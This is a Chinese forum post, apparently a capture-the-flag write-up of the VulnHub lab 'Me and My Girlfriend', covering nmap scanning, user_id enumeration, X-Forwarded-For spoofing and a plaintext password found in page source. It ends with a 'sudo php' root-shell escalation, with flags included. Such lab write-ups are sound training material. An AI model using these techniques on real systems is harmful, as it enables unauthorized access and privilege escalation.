登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 安全 me and my girlfriend WP&复盘

me and my girlfriend WP&复盘

毁抨句 2025-10-1 17:51:53
一台非常简单的靶机复盘
vulnhub官网注释
  1. Description
  2. Back to the Top
  3. Description: This VM tells us that there are a couple of lovers
  4. namely Alice and Bob,
  5. where the couple was originally very romantic,
  6. but since Alice worked at a private company,
  7. "Ceban Corp",
  8. something has changed from Alice's attitude towards Bob like
  9. something is "hidden", And Bob asks for your help to get what Alice
  10. is hiding and get full access to the company!
  12. Difficulty Level: Beginner
  14. Notes: there are 2 flag files
  16. Learning: Web Application | Simple Privilege Escalation
复制代码
后面如果遇到alice和bob这两个名字需要注意
nmap
  1. ┌──(kali㉿kali)-[~/replay/girl]
  2. └─$ nmap -sT -p- 192.168.206.155 -oA nmapscan/ports
  3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:22 EDT
  4. Nmap scan report for 192.168.206.155
  5. Host is up (0.0056s latency).
  6. Not shown: 65533 closed tcp ports (conn-refused)
  7. PORT   STATE SERVICE
  8. 22/tcp open  ssh
  9. 80/tcp open  http
  10. MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
  12. Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
  14. ┌──(kali㉿kali)-[~/replay/girl]
  15. └─$ nmap -sT -sC -sV -O -p22,80 192.168.206.155 -oA nmapscan/details
  16. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:23 EDT
  17. Nmap scan report for 192.168.206.155
  18. Host is up (0.0017s latency).
  20. PORT   STATE SERVICE VERSION
  21. 22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
  22. | ssh-hostkey:
  23. |   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
  24. |   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
  25. |   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
  26. |_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
  27. 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
  28. |_http-title: Site doesn't have a title (text/html).
  29. |_http-server-header: Apache/2.4.7 (Ubuntu)
  30. MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
  31. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  32. Device type: general purpose
  33. Running: Linux 3.X|4.X
  34. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  35. OS details: Linux 3.2 - 4.14
  36. Network Distance: 1 hop
  37. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  39. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  40. Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
  42. ┌──(kali㉿kali)-[~/replay/girl]
  43. └─$ nmap --script=vuln -p22,80 192.168.206.155 -oA nmapscan/vuln
  44. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:23 EDT
  45. Nmap scan report for 192.168.206.155
  46. Host is up (0.00089s latency).
  48. PORT   STATE SERVICE
  49. 22/tcp open  ssh
  50. 80/tcp open  http
  51. | http-slowloris-check:
  52. |   VULNERABLE:
  53. |   Slowloris DOS attack
  54. |     State: LIKELY VULNERABLE
  55. |     IDs:  CVE:CVE-2007-6750
  56. |       Slowloris tries to keep many connections to the target web server open and hold
  57. |       them open as long as possible.  It accomplishes this by opening connections to
  58. |       the target web server and sending a partial request. By doing so, it starves
  59. |       the http server's resources causing Denial Of Service.
  60. |      
  61. |     Disclosure date: 2009-09-17
  62. |     References:
  63. |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
  64. |_      http://ha.ckers.org/slowloris/
  65. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  66. |_http-csrf: Couldn't find any CSRF vulnerabilities.
  67. |_http-dombased-xss: Couldn't find any DOM based XSS.
  68. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
  69. | http-enum:
  70. |   /robots.txt: Robots file
  71. |   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
  72. |_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
  73. MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
  75. Nmap done: 1 IP address (1 host up) scanned in 321.63 seconds
复制代码
脚本扫描的同时访问80端口
1.png

可以看到这样一个页面
有一个login页面。简单用sql万能密码试了一下,没有发现SQL注入
sqlmap简单扫一下,没有发现sql注入
去注册一个用户,然后登录,后面如果没有思路了会尝试爆破
2.png

注册完之后登录
3.png

可以看到是可以成功登录的,观察url
http://192.168.206.155/index.php?page=dashboard&user_id=12
可以发现很有趣
写一个脚本,尝试给user_id不同值,curl信息
  1. ┌──(kali㉿kali)-[~/replay/girl]
  2. └─$ cat curl.py              
  3. import requests
  5. base_url = "http://192.168.206.155/index.php?page=dashboard&user_id="
  7. for user_id in range(-1, 16):  # 从 -1 到 15
  8.     url = f"{base_url}{user_id}"
  9.     try:
  10.         response = requests.get(url, timeout=5)
  11.         print(f"[+] user_id={user_id}, 状态码={response.status_code}")
  12.         print(response.text[:500])  # 打印前500字符
  13.         print("-" * 50)
  14.     except requests.RequestException as e:
  15.         print(f"[!] 请求 user_id={user_id} 出错: {e}")
复制代码
运行
  1. ┌──(kali㉿kali)-[~/replay/girl]
  2. └─$ python3 curl.py
  3. [+] user_id=-1, 状态码=200
  4. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  5. --------------------------------------------------
  6. [+] user_id=0, 状态码=200
  7. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  8. --------------------------------------------------
  9. [+] user_id=1, 状态码=200
  10. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  11. --------------------------------------------------
  12. [+] user_id=2, 状态码=200
  13. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  14. --------------------------------------------------
  15. [+] user_id=3, 状态码=200
  16. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  17. --------------------------------------------------
  18. [+] user_id=4, 状态码=200
  19. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  20. --------------------------------------------------
  21. [+] user_id=5, 状态码=200
  22. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  23. --------------------------------------------------
  24. [+] user_id=6, 状态码=200
  25. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  26. --------------------------------------------------
  27. [+] user_id=7, 状态码=200
  28. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  29. --------------------------------------------------
  30. [+] user_id=8, 状态码=200
  31. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  32. --------------------------------------------------
  33. [+] user_id=9, 状态码=200
  34. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  35. --------------------------------------------------
  36. [+] user_id=10, 状态码=200
  37. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  38. --------------------------------------------------
  39. [+] user_id=11, 状态码=200
  40. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  41. --------------------------------------------------
  42. [+] user_id=12, 状态码=200
  43. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  44. --------------------------------------------------
  45. [+] user_id=13, 状态码=200
  46. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  47. --------------------------------------------------
  48. [+] user_id=14, 状态码=200
  49. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  51. --------------------------------------------------
  52. [+] user_id=15, 状态码=200
  53. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
  55. --------------------------------------------------                     
复制代码
给了我们一个提示,可以尝试伪造x-forwarded-for请求头
这里由于值的范围比较小,就不写脚本了
在http://192.168.206.155/index.php?page=profile&user_id=5时,有一个alice,根据之前的Hint判断alice为重要用户
4.png

直接查看源码,已经明文给了密码
5.png

尝试ssh连接,不行再尝试其他用户
  1. ┌──(kali㉿kali)-[~/replay/girl┌──(kali㉿kali)-[~/replay/girl]
  2. └─$ ssh alice@192.168.206.155
  3. The authenticity of host '192.168.206.155 (192.168.206.155)' can't be established.
  4. ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
  5. This host key is known by the following other names/addresses:
  6.     ~/.ssh/known_hosts:17: [hashed name]
  7. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  8. Warning: Permanently added '192.168.206.155' (ED25519) to the list of known hosts.
  9. alice@192.168.206.155's password:
  10. Last login: Fri Dec 13 14:48:25 2019
  11. alice@gfriEND:~$
复制代码
直接连上
提权
  1. alice@gfriEND:~/.my_secret$ cat flag1.txt
  2. Greattttt my brother!
  3. You saw the Alice's note!
  4. Now you save the record information to give to bob!
  5. I know if it's given to him then Bob will be hurt but this is
  6. better than Bob cheated!
  8. Now your last job is get access to the root and read the flag ^_^
  10. Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
  11. alice@gfriEND:~/.my_secret$ cat my_notes.txt
  12. Woahhh! I like this company,
  13. I hope that here i get a better partner than bob ^_^,
  14. hopefully Bob doesn't know my notes
复制代码
说了一些比较隐私的信息并让我把证据给Bob
  1. alice@gfriEND:~/.my_secret$ cat my_notes.txt
  2. Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
  3. alice@gfriEND:~/.my_secret$ sudo -l
  4. Matching Defaults entries for alice on gfriEND:
  5.     env_reset, mail_badpass,
  6.     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  8. User alice may run the following commands on gfriEND:
  9.     (root) NOPASSWD: /usr/bin/php
  10. alice@gfriEND:~/.my_secret$
复制代码
在gtfobons上找到了php的sudo提权
  1. alice@gfriEND:~/.my_secret$ CMD="/bin/sh"
  2. alice@gfriEND:~/.my_secret$ sudo php -r "system('$CMD');"
  3. ls
  4. flag1.txt
  5. my_notes.txt
  6. whoami
  7. root
  8. id
  9. uid=0(root) gid=0(root) groups=0(root)
  10. cd /root
  11. ls
  12. flag2.txt
  13. cat flag2.txt       
  15.   ________        __    ___________.__             ___________.__                ._.
  16. /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
  17. /   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
  18. \    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
  19. \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
  20.         \/                              \/     \/       \/              \//_____/ \/
  22. Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
  24. Contact me if you want to contribute / give me feedback / share your writeup!
  25. Twitter: @makegreatagain_
  26. Instagram: @aldodimas73
  28. Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
复制代码
提权成功

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
meandmygirlfriendWP

使用道具 举报

相关推荐
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
毁抨句
2025-10-1 17:51:53

0

粉丝关注

20

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫